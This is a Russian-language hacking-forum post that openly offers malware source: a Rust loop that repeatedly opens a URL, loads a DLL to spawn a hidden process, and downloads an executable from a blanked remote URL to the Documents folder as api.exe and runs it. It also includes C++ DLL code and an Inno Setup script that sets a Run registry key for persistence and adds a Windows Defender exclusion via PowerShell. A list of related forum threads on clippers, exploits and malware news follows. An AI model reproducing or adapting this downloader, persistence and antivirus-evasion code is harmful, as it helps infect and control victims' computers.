Статья Реализация вредоносного ПО на Rust с загрузкой DLL и автозапуском

devqp

Специалист
Функционал программы:
- Бесконечный цикл с интервалом 20 секунд
- Открытие URL в браузере
- Динамическая загрузка DLL и вызов функции HideProcess
- Загрузка и выполнение обновленного исполняемого файла
- Сохранение в директории документов под именем api.exe

Реализация на Rust:
Код:
use std::{fs::File, io::copy, path::PathBuf, process::Command, thread, time::Duration};
use libloading::{Library, Symbol};
use reqwest::Client;

fn main() {
    let url = "https://";
    loop {
        webbrowser::open(url).unwrap_or_else(|e| {
            eprintln!("Error: {}", e);
            std::process::exit(1);
        });

        let lib = Library::new("path:\\path\\path\\src\\x.dll").unwrap_or_else(|e| {
            eprintln!("Error loading DLL: {}", e);
            std::process::exit(1);
        });

        unsafe {
            let hide_process: Symbol<unsafe extern "C" fn() -> i32> = lib.get(b"HideProcess").unwrap_or_else(|e| {
                eprintln!("Error getting symbol: {}", e);
                std::process::exit(1);
            });
            hide_process();
        }

        tokio::runtime::Runtime::new().unwrap().block_on(download_and_execute());
        thread::sleep(Duration::from_secs(20));
    }
}

async fn download_and_execute() {
    let download_url = "https://";
    let documents_dir = dirs::document_dir().expect("Failed to get Documents directory");
    let executable_path = documents_dir.join("api.exe");
    let client = Client::new();

    if let Ok(response) = client.get(download_url).send().await {
        if response.status().is_success() {
            let mut file = File::create(&executable_path).expect("Failed to create file");
            let bytes = response.bytes().await.expect("Failed to read bytes");
            copy(&mut bytes.as_ref(), &mut file).expect("Failed to copy data");
            Command::new(&executable_path).spawn().expect("Failed to execute");
        }
    }
}

Реализация функции HideProcess в DLL (C++):
Код:
#include "pch.h"
#include "MyDLL.h"
#include <Windows.h>

#ifdef MYDLL_EXPORTS
MYDLL_API int HideProcess() {
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;
    if (CreateProcess(NULL, L"exe.exe", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return 0;
    }
    return -1;
}
#endif

Настройка автозапуска через Inno Setup:
Ключевые элементы скрипта:
- Копирование исполняемого файла в целевую директорию
- Регистрация в автозагрузке через реестр
- Отключение защиты в реальном времени

Код:
[Files]
Source: "X:\{#MyAppExeName}"; DestDir: "{app}"; Flags: ignoreversion

[Registry]
Root: HKCU; Subkey: "Software\Microsoft\Windows\CurrentVersion\Run";
ValueType: string; ValueName: "{#MyAppName}"; ValueData: """{app}\{#MyAppExeName}"""

[Code]
procedure DisableRealTimeScanning;
begin
  Exec('powershell.exe', '-Command Add-MpPreference -ExclusionPath "{app}"', '', SW_HIDE, ewWaitUntilTerminated, ErrorCode);
end;
 
Похожие темы
devqp Статья Реализация API для блокировки Windows-ПК на Rust Полезные статьи 0
devqp Статья Реализация крипто-клиппера с заменой адресов через расстояние Левенштейна Вирусология 0
Admin Статья N-Day эксплойты - реализация и подходы Уязвимости и взлом 0
wrangler65 From Zero to Hero: Phishing Company. Техническая реализация Все остальное 0
S Реализация онлайн бизнеса в сфере Криптообменника Ищу работу. Предлагаю свои услуги. 0
S Реализация ваших $$$ проектов Предоставляю работу. Ищу специалиста. 1
Admin UFOLABSNEWS Новая версия вредоносного ПО PamStealer для macOS использует многослойное шифрование и устойчивость. Новости в сети 0
Admin UFOLABSNEWS Новая версия вредоносного ПО MacSync использует календари iCloud для доставки вредоносных модулей. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники использовали поддельный LastPass на GitHub для распространения вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Злоумышленник использовал ИИ для создания вредоносного npm-пакета PhantomRaven. Новости в сети 0
Admin UFOLABSNEWS Google Docs превратили в полноценный установщик вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Хакеры используют уязвимость приложения Tencent для распространения вредоносного ПО GrayRabbit. Новости в сети 0
Admin UFOLABSNEWS GuardBreaker: новый метод обхода анализа вредоносного кода с помощью комментариев. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники используют Node.js для распространения вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Хакеры использовали атаку BGP для распространения вредоносного обновления Virtualizor. Новости в сети 0
Admin UFOLABSNEWS ValleyRAT использует легитимное ПО для распространения вредоносного кода. Новости в сети 0
devqp Статья Эксплуатация Google Ads для распространения вредоносного ПО и сетевого взлома Уязвимости и взлом 0
Admin UFOLABSNEWS Злоумышленники используют браузеры жертв для сборки вредоносного ПО. Новости в сети 0
Admin Интересно Хакеры используют плагины Notepad++ для скрытой установки вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Новый метод HalluSquatting позволяет обмануть ИИ-ассистентов для установки вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Китайские хакеры UAT-7810 расширяют сеть ORB с помощью нового вредоносного ПО LONGLEASH. Новости в сети 0
Admin UFOLABSNEWS Группа Armored Likho использует ИИ для создания вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS Исследователь проанализировал 3000 вредоносных нагрузок ClickFix, раскрыв API-управляемую доставку вредоносного ПО. Новости в сети 0
Admin UFOLABSNEWS GitHub стал платформой для распространения вредоносного ПО через поддельные репозитории. Новости в сети 0
Admin Интересно Официальный пакет Mastra стал источником вредоносного кода. Новости в сети 0
Admin Интересно Microsoft раскрыла детали кампании вредоносного ПО Windows Clipper, использующего USB LNK червя и Tor для управления. Новости в сети 0
Admin Интересно Северокорейские хакеры используют поддельные уведомления Microsoft для распространения вредоносного ПО NarwhalRAT. Новости в сети 0
Admin Интересно Северокорейские хакеры используют инструменты разработчиков для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Более 400 пакетов Arch Linux AUR были скомпрометированы для установки вредоносного ПО. Новости в сети 0
Admin Интересно Хакеры используют TikTok для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Мошенники используют поддельные сайты с ссылками на GitHub для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Фейковые сайты имитируют открытые проекты для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Google DoubleClick используется в новой кампании для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Группа Gamaredon использует уязвимость WinRAR для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Новая киберкампания JINX-0164 атакует криптовалютные компании с помощью фишинга и вредоносного ПО для macOS. Новости в сети 0
Admin Интересно Искусственный интеллект используется для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Северокорейская группировка Void Dokkaebi сменила язык программирования для вредоносного ПО. Новости в сети 0
Admin Интересно Сайт директора ФБР Каша Пателя отключён после обнаружения вредоносного ПО. Новости в сети 0
Admin Интересно Пакеты Laravel-Lang скомпрометированы для распространения ворующего данные вредоносного ПО. Новости в сети 0
Admin Интересно Microsoft ликвидировала сеть подписи вредоносного ПО Fox Tempest. Новости в сети 0
Admin Интересно Злоумышленники используют Microsoft Teams для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Злоумышленники используют платформу n8n для фишинга и распространения вредоносного ПО. Новости в сети 0
Admin Интересно Северокорейская группа APT37 использует социальную инженерию в Facebook для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Взлом сайта CPUID привёл к распространению вредоносного ПО через поддельные версии CPU-Z и HWMonitor. Новости в сети 0
Admin Интересно Злоумышленники взломали аккаунт npm библиотеки Axios для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Северокорейские хакеры используют VS Code для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Microsoft предупреждает о фишинговых атаках с использованием вредоносного ПО. Новости в сети 0
Admin Интересно Атака GlassWorm использует украденные токены GitHub для внедрения вредоносного кода в репозитории Python. Новости в сети 0
Admin Интересно Хакеры используют ИИ для создания вредоносного ПО Slopoly. Новости в сети 0
Admin Интересно Группа APT28 проводит долгосрочный шпионаж против украинских военных с использованием вредоносного ПО. Новости в сети 0

Название темы